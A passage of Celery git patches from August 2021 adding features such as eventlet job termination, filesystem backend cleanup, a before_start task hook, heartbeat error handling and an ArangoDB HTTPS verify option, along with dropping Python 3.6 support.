If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.2.0b1 coming from previous versions then you should read our
+new to Celery 5.0.5 or 5.2.0b2 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/celery/__init__.py b/celery/__init__.py
index df89bf8936f..6248ddec82c 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0b1'
+__version__ = '5.2.0b2'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 600b48da6a9..5cf7b344ea5 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0b1 (cliffs)
+:Version: 5.2.0b2 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From ad994719bafe6747af6cf8251efb0925284a9260 Mon Sep 17 00:00:00 2001
From: Dave Johansen
Date: Tue, 17 Aug 2021 11:54:04 -0600
Subject: [PATCH 045/177] Add args to LOG_RECEIVED (fixes #6885) (#6898)
* Add args and kwargs to LOG_RECEIVED and LOG_SUCCESS
* Add kwargs and args to test
---
celery/app/trace.py | 2 ++
celery/worker/strategy.py | 8 +++++++-
t/unit/worker/test_strategy.py | 2 +-
3 files changed, 10 insertions(+), 2 deletions(-)
diff --git a/celery/app/trace.py b/celery/app/trace.py
index ad2bd581dbb..8c4f763a592 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -527,6 +527,8 @@ def trace_task(uuid, args, kwargs, request=None):
'name': get_task_name(task_request, name),
'return_value': Rstr,
'runtime': T,
+ 'args': safe_repr(args),
+ 'kwargs': safe_repr(kwargs),
})
# -* POST *-
diff --git a/celery/worker/strategy.py b/celery/worker/strategy.py
index 09bdea7c1be..b6e9a17c6b6 100644
--- a/celery/worker/strategy.py
+++ b/celery/worker/strategy.py
@@ -2,6 +2,7 @@
import logging
from kombu.asynchronous.timer import to_timestamp
+from kombu.utils.encoding import safe_repr
from celery import signals
from celery.app import trace as _app_trace
@@ -151,7 +152,12 @@ def task_message_handler(message, body, ack, reject, callbacks,
if _does_info:
# Similar to `app.trace.info()`, we pass the formatting args as the
# `extra` kwarg for custom log handlers
- context = {'id': req.id, 'name': req.name}
+ context = {
+ 'id': req.id,
+ 'name': req.name,
+ 'args': safe_repr(req.args),
+ 'kwargs': safe_repr(req.kwargs),
+ }
info(_app_trace.LOG_RECEIVED, context, extra={'data': context})
if (req.expires or req.id in revoked_tasks) and req.revoked():
return
diff --git a/t/unit/worker/test_strategy.py b/t/unit/worker/test_strategy.py
index cb8c73d17cb..2e81fa0b7f9 100644
--- a/t/unit/worker/test_strategy.py
+++ b/t/unit/worker/test_strategy.py
@@ -191,7 +191,7 @@ def test_log_task_received_custom(self, caplog):
C()
for record in caplog.records:
if record.msg == custom_fmt:
- assert set(record.args) == {"id", "name"}
+ assert set(record.args) == {"id", "name", "kwargs", "args"}
break
else:
raise ValueError("Expected message not in captured log records")
From 16959cdb895b187265745d19a212ca0844c6dd78 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C4=90or=C4=91e=20Ivkovi=C4=87?=
Date: Wed, 18 Aug 2021 20:16:37 +0200
Subject: [PATCH 046/177] Terminate job implementation for eventlet concurrency
backend (#6917)
* Terminate job eventlet implementation
#asd
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
* Use {} instead of dict
* Requested fixes
* Update workers guide docs
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
celery/concurrency/eventlet.py | 47 +++++++++++++++++++++++++----
docs/userguide/workers.rst | 2 +-
t/unit/concurrency/test_eventlet.py | 31 +++++++++++++++++++
3 files changed, 73 insertions(+), 7 deletions(-)
diff --git a/celery/concurrency/eventlet.py b/celery/concurrency/eventlet.py
index c6bb3415f69..f9c9da7f994 100644
--- a/celery/concurrency/eventlet.py
+++ b/celery/concurrency/eventlet.py
@@ -2,6 +2,7 @@
import sys
from time import monotonic
+from greenlet import GreenletExit
from kombu.asynchronous import timer as _timer
from celery import signals
@@ -93,6 +94,7 @@ class TaskPool(base.BasePool):
is_green = True
task_join_will_block = False
_pool = None
+ _pool_map = None
_quick_put = None
def __init__(self, *args, **kwargs):
@@ -107,8 +109,9 @@ def __init__(self, *args, **kwargs):
def on_start(self):
self._pool = self.Pool(self.limit)
+ self._pool_map = {}
signals.eventlet_pool_started.send(sender=self)
- self._quick_put = self._pool.spawn_n
+ self._quick_put = self._pool.spawn
self._quick_apply_sig = signals.eventlet_pool_apply.send
def on_stop(self):
@@ -119,12 +122,17 @@ def on_stop(self):
def on_apply(self, target, args=None, kwargs=None, callback=None,
accept_callback=None, **_):
- self._quick_apply_sig(
- sender=self, target=target, args=args, kwargs=kwargs,
+ target = TaskPool._make_killable_target(target)
+ self._quick_apply_sig(sender=self, target=target, args=args, kwargs=kwargs,)
+ greenlet = self._quick_put(
+ apply_target,
+ target, args,
+ kwargs,
+ callback,
+ accept_callback,
+ self.getpid
)
- self._quick_put(apply_target, target, args, kwargs,
- callback, accept_callback,
- self.getpid)
+ self._add_to_pool_map(id(greenlet), greenlet)
def grow(self, n=1):
limit = self.limit + n
@@ -136,6 +144,12 @@ def shrink(self, n=1):
self._pool.resize(limit)
self.limit = limit
+ def terminate_job(self, pid, signal=None):
+ if pid in self._pool_map.keys():
+ greenlet = self._pool_map[pid]
+ greenlet.kill()
+ greenlet.wait()
+
def _get_info(self):
info = super()._get_info()
info.update({
@@ -144,3 +158,24 @@ def _get_info(self):
'running-threads': self._pool.running(),
})
return info
+
+ @staticmethod
+ def _make_killable_target(target):
+ def killable_target(*args, **kwargs):
+ try:
+ return target(*args, **kwargs)
+ except GreenletExit:
+ return (False, None, None)
+ return killable_target
+
+ def _add_to_pool_map(self, pid, greenlet):
+ self._pool_map[pid] = greenlet
+ greenlet.link(
+ TaskPool._cleanup_after_job_finish,
+ self._pool_map,
+ pid
+ )
+
+ @staticmethod
+ def _cleanup_after_job_finish(greenlet, pool_map, pid):
+ del pool_map[pid]
diff --git a/docs/userguide/workers.rst b/docs/userguide/workers.rst
index fa3cf468884..74e29490913 100644
--- a/docs/userguide/workers.rst
+++ b/docs/userguide/workers.rst
@@ -324,7 +324,7 @@ Commands
``revoke``: Revoking tasks
--------------------------
-:pool support: all, terminate only supported by prefork
+:pool support: all, terminate only supported by prefork and eventlet
:broker support: *amqp, redis*
:command: :program:`celery -A proj control revoke `
diff --git a/t/unit/concurrency/test_eventlet.py b/t/unit/concurrency/test_eventlet.py
index dcd803e5342..9dcdb479b26 100644
--- a/t/unit/concurrency/test_eventlet.py
+++ b/t/unit/concurrency/test_eventlet.py
@@ -2,6 +2,7 @@
from unittest.mock import Mock, patch
import pytest
+from greenlet import GreenletExit
import t.skip
from celery.concurrency.eventlet import TaskPool, Timer, apply_target
@@ -101,6 +102,7 @@ def test_pool(self):
x.on_apply(Mock())
x._pool = None
x.on_stop()
+ assert len(x._pool_map.keys()) == 1
assert x.getpid()
@patch('celery.concurrency.eventlet.base')
@@ -130,3 +132,32 @@ def test_get_info(self):
'free-threads': x._pool.free(),
'running-threads': x._pool.running(),
}
+
+ def test_terminate_job(self):
+ func = Mock()
+ pool = TaskPool(10)
+ pool.on_start()
+ pool.on_apply(func)
+
+ assert len(pool._pool_map.keys()) == 1
+ pid = list(pool._pool_map.keys())[0]
+ greenlet = pool._pool_map[pid]
+
+ pool.terminate_job(pid)
+ greenlet.link.assert_called_once()
+ greenlet.kill.assert_called_once()
+
+ def test_make_killable_target(self):
+ def valid_target():
+ return "some result..."
+
+ def terminating_target():
+ raise GreenletExit()
+
+ assert TaskPool._make_killable_target(valid_target)() == "some result..."
+ assert TaskPool._make_killable_target(terminating_target)() == (False, None, None)
+
+ def test_cleanup_after_job_finish(self):
+ testMap = {'1': None}
+ TaskPool._cleanup_after_job_finish(None, testMap, '1')
+ assert len(testMap) == 0
From 3ef5b54bd5ff6d5b5e9184f348817a209e9111d6 Mon Sep 17 00:00:00 2001
From: Evgeny Prigorodov
Date: Sat, 21 Aug 2021 11:47:16 +0200
Subject: [PATCH 047/177] Add cleanup implementation to filesystem backend
(#6919)
* Add cleanup implementation to filesystem backend
* improve unit test coverage
in backends.filesystem.FilesystemBackend.cleanup()
* replace os.scandir() with os.listdir()
due to possible problems when testing under pypy-3.7, windows-2019
(https://github.com/pytest-dev/pytest/issues/6419)
---
celery/backends/filesystem.py | 17 ++++++++++++++
t/unit/backends/test_filesystem.py | 36 ++++++++++++++++++++++++++++++
2 files changed, 53 insertions(+)
diff --git a/celery/backends/filesystem.py b/celery/backends/filesystem.py
index 26a48aeaa56..6bc6bb141d0 100644
--- a/celery/backends/filesystem.py
+++ b/celery/backends/filesystem.py
@@ -1,6 +1,7 @@
"""File-system result store backend."""
import locale
import os
+from datetime import datetime
from kombu.utils.encoding import ensure_bytes
@@ -94,3 +95,19 @@ def mget(self, keys):
def delete(self, key):
self.unlink(self._filename(key))
+
+ def cleanup(self):
+ """Delete expired meta-data."""
+ if not self.expires:
+ return
+ epoch = datetime(1970, 1, 1, tzinfo=self.app.timezone)
+ now_ts = (self.app.now() - epoch).total_seconds()
+ cutoff_ts = now_ts - self.expires
+ for filename in os.listdir(self.path):
+ for prefix in (self.task_keyprefix, self.group_keyprefix,
+ self.chord_keyprefix):
+ if filename.startswith(prefix):
+ path = os.path.join(self.path, filename)
+ if os.stat(path).st_mtime < cutoff_ts:
+ self.unlink(path)
+ break
diff --git a/t/unit/backends/test_filesystem.py b/t/unit/backends/test_filesystem.py
index 98a37b2e070..4fb46683f4f 100644
--- a/t/unit/backends/test_filesystem.py
+++ b/t/unit/backends/test_filesystem.py
@@ -1,6 +1,9 @@
import os
import pickle
+import sys
import tempfile
+import time
+from unittest.mock import patch
import pytest
@@ -92,3 +95,36 @@ def test_forget_deletes_file(self):
def test_pickleable(self):
tb = FilesystemBackend(app=self.app, url=self.url, serializer='pickle')
assert pickle.loads(pickle.dumps(tb))
+
+ @pytest.mark.skipif(sys.platform == 'win32', reason='Test can fail on '
+ 'Windows/FAT due to low granularity of st_mtime')
+ def test_cleanup(self):
+ tb = FilesystemBackend(app=self.app, url=self.url)
+ yesterday_task_ids = [uuid() for i in range(10)]
+ today_task_ids = [uuid() for i in range(10)]
+ for tid in yesterday_task_ids:
+ tb.mark_as_done(tid, 42)
+ day_length = 0.2
+ time.sleep(day_length) # let FS mark some difference in mtimes
+ for tid in today_task_ids:
+ tb.mark_as_done(tid, 42)
+ with patch.object(tb, 'expires', 0):
+ tb.cleanup()
+ # test that zero expiration time prevents any cleanup
+ filenames = set(os.listdir(tb.path))
+ assert all(
+ tb.get_key_for_task(tid) in filenames
+ for tid in yesterday_task_ids + today_task_ids
+ )
+ # test that non-zero expiration time enables cleanup by file mtime
+ with patch.object(tb, 'expires', day_length):
+ tb.cleanup()
+ filenames = set(os.listdir(tb.path))
+ assert not any(
+ tb.get_key_for_task(tid) in filenames
+ for tid in yesterday_task_ids
+ )
+ assert all(
+ tb.get_key_for_task(tid) in filenames
+ for tid in today_task_ids
+ )
From ba64109d68b00b32fb7898daf72f72469aaaebb4 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Tue, 24 Aug 2021 11:42:40 +0300
Subject: [PATCH 048/177] [pre-commit.ci] pre-commit autoupdate (#6926)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.23.3 → v2.24.0](https://github.com/asottile/pyupgrade/compare/v2.23.3...v2.24.0)
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 4781a27634d..c05c93b2734 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.23.3
+ rev: v2.24.0
hooks:
- id: pyupgrade
args: ["--py36-plus"]
From 45871eb839f0c0cbb92e6d6b5a78694c42385589 Mon Sep 17 00:00:00 2001
From: Cristi
Date: Wed, 25 Aug 2021 19:26:35 +0200
Subject: [PATCH 049/177] Add before_start hook (fixes #4110) (#6923)
* Add before_start handler
* Add documentation
* Fix docs of arguments; add versionadded directive
* Add versionadded directive in docstring
Co-authored-by: Cristian Betivu
---
celery/app/task.py | 14 ++++++++++++++
celery/app/trace.py | 6 ++++++
docs/userguide/tasks.rst | 12 ++++++++++++
t/unit/tasks/test_trace.py | 8 ++++++++
4 files changed, 40 insertions(+)
diff --git a/celery/app/task.py b/celery/app/task.py
index 06366d73ed1..e58b5b8ade5 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -972,6 +972,20 @@ def update_state(self, task_id=None, state=None, meta=None, **kwargs):
self.backend.store_result(
task_id, meta, state, request=self.request, **kwargs)
+ def before_start(self, task_id, args, kwargs):
+ """Handler called before the task starts.
+
+ .. versionadded:: 5.2
+
+ Arguments:
+ task_id (str): Unique id of the task to execute.
+ args (Tuple): Original arguments for the task to execute.
+ kwargs (Dict): Original keyword arguments for the task to execute.
+
+ Returns:
+ None: The return value of this handler is ignored.
+ """
+
def on_success(self, retval, task_id, args, kwargs):
"""Success handler.
diff --git a/celery/app/trace.py b/celery/app/trace.py
index 8c4f763a592..7b5b00b8c95 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -345,8 +345,11 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
loader_task_init = loader.on_task_init
loader_cleanup = loader.on_process_cleanup
+ task_before_start = None
task_on_success = None
task_after_return = None
+ if task_has_custom(task, 'before_start'):
+ task_before_start = task.before_start
if task_has_custom(task, 'on_success'):
task_on_success = task.on_success
if task_has_custom(task, 'after_return'):
@@ -442,6 +445,9 @@ def trace_task(uuid, args, kwargs, request=None):
# -*- TRACE -*-
try:
+ if task_before_start:
+ task_before_start(uuid, args, kwargs)
+
R = retval = fun(*args, **kwargs)
state = SUCCESS
except Reject as exc:
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index 0fb1f2463aa..eeb31d3ed21 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -1440,6 +1440,18 @@ The default value is the class provided by Celery: ``'celery.app.task:Task'``.
Handlers
--------
+.. method:: before_start(self, task_id, args, kwargs)
+
+ Run by the worker before the task starts executing.
+
+ .. versionadded:: 5.2
+
+ :param task_id: Unique id of the task to execute.
+ :param args: Original arguments for the task to execute.
+ :param kwargs: Original keyword arguments for the task to execute.
+
+ The return value of this handler is ignored.
+
.. method:: after_return(self, status, retval, task_id, args, kwargs, einfo)
Handler called after the task returns.
diff --git a/t/unit/tasks/test_trace.py b/t/unit/tasks/test_trace.py
index f796a12aa95..55c106894bd 100644
--- a/t/unit/tasks/test_trace.py
+++ b/t/unit/tasks/test_trace.py
@@ -61,6 +61,14 @@ def test_trace_successful(self):
assert info is None
assert retval == 4
+ def test_trace_before_start(self):
+ @self.app.task(shared=False, before_start=Mock())
+ def add_with_before_start(x, y):
+ return x + y
+
+ self.trace(add_with_before_start, (2, 2), {})
+ add_with_before_start.before_start.assert_called()
+
def test_trace_on_success(self):
@self.app.task(shared=False, on_success=Mock())
def add_with_success(x, y):
From e726978a39a05838805d2b026c4f1c962cfb23b7 Mon Sep 17 00:00:00 2001
From: Josue Balandrano Coronel
Date: Thu, 26 Aug 2021 02:49:51 -0500
Subject: [PATCH 050/177] Restart consumer if connection drops (#6930)
* Restart consumer if the celery connection drops
original commit by @bremac https://github.com/celery/celery/commit/385a60df09201a17ad646c71eb1c00255d0a4431?diff=unified
Previously if an ack or reject message failed because the connection
was unavailable then celery would stop accepting messages until it was
restarted. This problem is that the main celery loop is responsible for
detecting closed connections, but the connection errors would not always
reach the main loop.
There are three places in celery that share a long-running AMQP connection:
1. The core worker loop listens for new messages.
2. The ack / reject code that runs after a task completes.
3. The heartbeat loop that keeps the connection alive.
Neither of the first two is guaranteed to see an error if the connection drops.
The main listener may never see an error if the connection drops since it may be
swallowed by drain_events; the connection may drop while no work is being done,
so the ack / reject code will never be triggered.
Fortunately the heartbeat loop is guaranteed to see an error if the connection
dies: periodic writes to the socket will fail with a broken pipe error.
Unfortunately it runs in a separate thread, so previously connection errors were
swallowed silently.
This commit alters the heartbeat code so that heartbeat errors are always
re-raised in the main loop. This triggers existing code in the worker that
restarts the worker, reestablishing the connection. With the fix in place I've
been able to trigger ten long-running (three minute) RCA queries without the
worker hanging; without the fix it became unavailable after one or two queries.
* fix: heartbeat_error to object
* revert: heartbeat_error has to be passed by reference.
- preallocating the list avoids it from growing on each check
* fix: add comment
* Add unit tests
* Fix lint
* Update call to args in test
Co-authored-by: Steven Joseph
---
celery/worker/loops.py | 33 +++++++++++++----
t/unit/worker/test_loops.py | 74 +++++++++++++++++++++++++++++++++++--
2 files changed, 97 insertions(+), 10 deletions(-)
diff --git a/celery/worker/loops.py b/celery/worker/loops.py
index b60d95c11de..0630e679fdd 100644
--- a/celery/worker/loops.py
+++ b/celery/worker/loops.py
@@ -26,11 +26,25 @@ def _quick_drain(connection, timeout=0.1):
def _enable_amqheartbeats(timer, connection, rate=2.0):
- if connection:
- tick = connection.heartbeat_check
- heartbeat = connection.get_heartbeat_interval() # negotiated
- if heartbeat and connection.supports_heartbeats:
- timer.call_repeatedly(heartbeat / rate, tick, (rate,))
+ heartbeat_error = [None]
+
+ if not connection:
+ return heartbeat_error
+
+ heartbeat = connection.get_heartbeat_interval() # negotiated
+ if not (heartbeat and connection.supports_heartbeats):
+ return heartbeat_error
+
+ def tick(rate):
+ try:
+ connection.heartbeat_check(rate)
+ except Exception as e:
+ # heartbeat_error is passed by reference can be updated
+ # no append here list should be fixed size=1
+ heartbeat_error[0] = e
+
+ timer.call_repeatedly(heartbeat / rate, tick, (rate,))
+ return heartbeat_error
def asynloop(obj, connection, consumer, blueprint, hub, qos,
@@ -42,7 +56,7 @@ def asynloop(obj, connection, consumer, blueprint, hub, qos,
on_task_received = obj.create_task_handler()
- _enable_amqheartbeats(hub.timer, connection, rate=hbrate)
+ heartbeat_error = _enable_amqheartbeats(hub.timer, connection, rate=hbrate)
consumer.on_message = on_task_received
obj.controller.register_with_event_loop(hub)
@@ -70,6 +84,8 @@ def asynloop(obj, connection, consumer, blueprint, hub, qos,
try:
while blueprint.state == RUN and obj.connection:
state.maybe_shutdown()
+ if heartbeat_error[0] is not None:
+ raise heartbeat_error[0]
# We only update QoS when there's no more messages to read.
# This groups together qos calls, and makes sure that remote
@@ -95,8 +111,9 @@ def synloop(obj, connection, consumer, blueprint, hub, qos,
RUN = bootsteps.RUN
on_task_received = obj.create_task_handler()
perform_pending_operations = obj.perform_pending_operations
+ heartbeat_error = [None]
if getattr(obj.pool, 'is_green', False):
- _enable_amqheartbeats(obj.timer, connection, rate=hbrate)
+ heartbeat_error = _enable_amqheartbeats(obj.timer, connection, rate=hbrate)
consumer.on_message = on_task_received
consumer.consume()
@@ -104,6 +121,8 @@ def synloop(obj, connection, consumer, blueprint, hub, qos,
while blueprint.state == RUN and obj.connection:
state.maybe_shutdown()
+ if heartbeat_error[0] is not None:
+ raise heartbeat_error[0]
if qos.prev != qos.value:
qos.update()
try:
diff --git a/t/unit/worker/test_loops.py b/t/unit/worker/test_loops.py
index 27d1b832ea0..2b2db226554 100644
--- a/t/unit/worker/test_loops.py
+++ b/t/unit/worker/test_loops.py
@@ -158,9 +158,10 @@ def test_setup_heartbeat(self):
asynloop(*x.args)
x.consumer.consume.assert_called_with()
x.obj.on_ready.assert_called_with()
- x.hub.timer.call_repeatedly.assert_called_with(
- 10 / 2.0, x.connection.heartbeat_check, (2.0,),
- )
+ last_call_args, _ = x.hub.timer.call_repeatedly.call_args
+
+ assert last_call_args[0] == 10 / 2.0
+ assert last_call_args[2] == (2.0,)
def task_context(self, sig, **kwargs):
x, on_task = get_task_callback(self.app, **kwargs)
@@ -429,6 +430,30 @@ def test_poll_raises_ValueError(self):
asynloop(*x.args)
poller.poll.assert_called()
+ def test_heartbeat_error(self):
+ x = X(self.app, heartbeat=10)
+ x.connection.heartbeat_check = Mock(
+ side_effect=RuntimeError("Heartbeat error")
+ )
+
+ def call_repeatedly(rate, fn, args):
+ fn(*args)
+
+ x.hub.timer.call_repeatedly = call_repeatedly
+ with pytest.raises(RuntimeError):
+ asynloop(*x.args)
+
+ def test_no_heartbeat_support(self):
+ x = X(self.app)
+ x.connection.supports_heartbeats = False
+ x.hub.timer.call_repeatedly = Mock(
+ name='x.hub.timer.call_repeatedly()'
+ )
+ x.hub.on_tick.add(x.closer(mod=2))
+ asynloop(*x.args)
+
+ x.hub.timer.call_repeatedly.assert_not_called()
+
class test_synloop:
@@ -459,6 +484,49 @@ def test_ignores_socket_errors_when_closed(self):
x.close_then_error(x.connection.drain_events)
assert synloop(*x.args) is None
+ def test_no_connection(self):
+ x = X(self.app)
+ x.connection = None
+ x.hub.timer.call_repeatedly = Mock(
+ name='x.hub.timer.call_repeatedly()'
+ )
+ x.blueprint.state = CLOSE
+ synloop(*x.args)
+
+ x.hub.timer.call_repeatedly.assert_not_called()
+
+ def test_heartbeat_error(self):
+ x = X(self.app, heartbeat=10)
+ x.obj.pool.is_green = True
+
+ def heartbeat_check(rate):
+ raise RuntimeError('Heartbeat error')
+
+ def call_repeatedly(rate, fn, args):
+ fn(*args)
+
+ x.connection.heartbeat_check = Mock(
+ name='heartbeat_check', side_effect=heartbeat_check
+ )
+ x.obj.timer.call_repeatedly = call_repeatedly
+ with pytest.raises(RuntimeError):
+ synloop(*x.args)
+
+ def test_no_heartbeat_support(self):
+ x = X(self.app)
+ x.connection.supports_heartbeats = False
+ x.obj.pool.is_green = True
+ x.obj.timer.call_repeatedly = Mock(
+ name='x.obj.timer.call_repeatedly()'
+ )
+
+ def drain_events(timeout):
+ x.blueprint.state = CLOSE
+ x.connection.drain_events.side_effect = drain_events
+ synloop(*x.args)
+
+ x.obj.timer.call_repeatedly.assert_not_called()
+
class test_quick_drain:
From ec5b1d7fff597e5e69ba273bec224ba704437e5b Mon Sep 17 00:00:00 2001
From: kronion
Date: Thu, 26 Aug 2021 23:29:32 -0500
Subject: [PATCH 051/177] Remove outdated optimization documentation (#6933)
* Remove outdated optimization documentation
* Update CONTRIBUTORS.txt
---
CONTRIBUTORS.txt | 1 +
docs/getting-started/next-steps.rst | 7 -------
2 files changed, 1 insertion(+), 7 deletions(-)
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index fa80335e9c9..5dee5a11685 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -284,3 +284,4 @@ Ruaridh Williamson, 2021/03/09
Garry Lawrence, 2021/06/19
Patrick Zhang, 2017/08/19
Konstantin Kochin, 2021/07/11
+kronion, 2021/08/26
diff --git a/docs/getting-started/next-steps.rst b/docs/getting-started/next-steps.rst
index 2b66fd5ce04..d919d0e57c5 100644
--- a/docs/getting-started/next-steps.rst
+++ b/docs/getting-started/next-steps.rst
@@ -766,13 +766,6 @@ If you have strict fair scheduling requirements, or want to optimize
for throughput then you should read the :ref:`Optimizing Guide
`.
-If you're using RabbitMQ then you can install the :pypi:`librabbitmq`
-module, an AMQP client implemented in C:
-
-.. code-block:: console
-
- $ pip install librabbitmq
-
What to do now?
===============
From 8b705b1ddbef81d431e41d3722e4176802dd4987 Mon Sep 17 00:00:00 2001
From: Dilip Vamsi Moturi <16288600+dilipvamsi@users.noreply.github.com>
Date: Mon, 30 Aug 2021 13:34:58 +0530
Subject: [PATCH 052/177] added https verification check functionality in
arangodb backend (#6800)
* added https verification functionality
* added verify tests
---
celery/backends/arangodb.py | 4 +++-
docs/userguide/configuration.rst | 10 ++++++++++
t/unit/backends/test_arangodb.py | 5 ++++-
3 files changed, 17 insertions(+), 2 deletions(-)
diff --git a/celery/backends/arangodb.py b/celery/backends/arangodb.py
index 1cd82078070..a7575741575 100644
--- a/celery/backends/arangodb.py
+++ b/celery/backends/arangodb.py
@@ -48,6 +48,7 @@ class ArangoDbBackend(KeyValueStoreBackend):
password = None
# protocol is not supported in backend url (http is taken as default)
http_protocol = 'http'
+ verify = False
# Use str as arangodb key not bytes
key_t = str
@@ -88,6 +89,7 @@ def __init__(self, url=None, *args, **kwargs):
self.host = host or config.get('host', self.host)
self.port = int(port or config.get('port', self.port))
self.http_protocol = config.get('http_protocol', self.http_protocol)
+ self.verify = config.get('verify', self.verify)
self.database = database or config.get('database', self.database)
self.collection = \
collection or config.get('collection', self.collection)
@@ -104,7 +106,7 @@ def connection(self):
if self._connection is None:
self._connection = py_arango_connection.Connection(
arangoURL=self.arangodb_url, username=self.username,
- password=self.password
+ password=self.password, verify=self.verify
)
return self._connection
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index 68207482b8e..f78388fd7b7 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -1884,6 +1884,16 @@ This is a dict supporting the following keys:
Password to authenticate to the ArangoDB server (optional).
+* ``http_protocol``
+
+ HTTP Protocol in ArangoDB server connection.
+ Defaults to ``http``.
+
+* ``verify``
+
+ HTTPS Verification check while creating the ArangoDB connection.
+ Defaults to ``False``.
+
.. _conf-cosmosdbsql-result-backend:
CosmosDB backend settings (experimental)
diff --git a/t/unit/backends/test_arangodb.py b/t/unit/backends/test_arangodb.py
index 2cb2f33c9db..992c21a8ef4 100644
--- a/t/unit/backends/test_arangodb.py
+++ b/t/unit/backends/test_arangodb.py
@@ -71,7 +71,8 @@ def test_config_params(self):
'password': 'mysecret',
'database': 'celery_database',
'collection': 'celery_collection',
- 'http_protocol': 'https'
+ 'http_protocol': 'https',
+ 'verify': True
}
x = ArangoDbBackend(app=self.app)
assert x.host == 'test.arangodb.com'
@@ -82,6 +83,7 @@ def test_config_params(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'https'
assert x.arangodb_url == 'https://test.arangodb.com:8529'
+ assert x.verify == True
def test_backend_by_url(
self, url="arangodb://username:password@host:port/database/collection"
@@ -106,6 +108,7 @@ def test_backend_params_by_url(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'http'
assert x.arangodb_url == 'http://test.arangodb.com:8529'
+ assert x.verify == False
def test_backend_cleanup(self):
now = datetime.datetime.utcnow()
From 25570839c539578b83b9e9d2ff9d90b27c9b9d38 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Sun, 29 Aug 2021 11:49:26 +0300
Subject: [PATCH 053/177] Drop Python 3.6 support.
Python 3.6 is EOL in a few days and 5.2 will not support it.
Therefore, we will not need to test Celery with Python 3.6 anymore.
---
.github/workflows/python-package.yml | 2 +-
tox.ini | 10 ++++------
2 files changed, 5 insertions(+), 7 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 41b525ca2cb..0c1855b7ebb 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,7 +24,7 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-rc.1', 'pypy-3.6', 'pypy-3.7']
+ python-version: ['3.7', '3.8', '3.9', '3.10.0-rc.1', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
exclude:
- os: windows-2019
diff --git a/tox.ini b/tox.ini
index bf181af2731..64213027b9c 100644
--- a/tox.ini
+++ b/tox.ini
@@ -2,8 +2,8 @@
requires =
tox-gh-actions
envlist =
- {3.6,3.7,3.8,3.9,3.10,pypy3}-unit
- {3.6,3.7,3.8,3.9,3.10,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
+ {3.7,3.8,3.9,3.10,pypy3}-unit
+ {3.7,3.8,3.9,3.10,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
flake8
apicheck
@@ -13,7 +13,6 @@ envlist =
[gh-actions]
python =
- 3.6: 3.6-unit
3.7: 3.7-unit
3.8: 3.8-unit
3.9: 3.9-unit
@@ -31,8 +30,8 @@ deps=
-r{toxinidir}/requirements/test.txt
-r{toxinidir}/requirements/pkgutils.txt
- 3.6,3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/test-ci-default.txt
- 3.6,3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/docs.txt
+ 3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/test-ci-default.txt
+ 3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/docs.txt
pypy3: -r{toxinidir}/requirements/test-ci-default.txt
integration: -r{toxinidir}/requirements/test-integration.txt
@@ -74,7 +73,6 @@ setenv =
azureblockblob: TEST_BACKEND=azureblockblob://DefaultEndpointsProtocol=http;AccountName=devstoreaccount1;AccountKey=Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw==;BlobEndpoint=http://127.0.0.1:10000/devstoreaccount1;
basepython =
- 3.6: python3.6
3.7: python3.7
3.8: python3.8
3.9: python3.9
From a0635955391992180171f75d80be72c5752635e5 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 30 Aug 2021 17:28:25 +0600
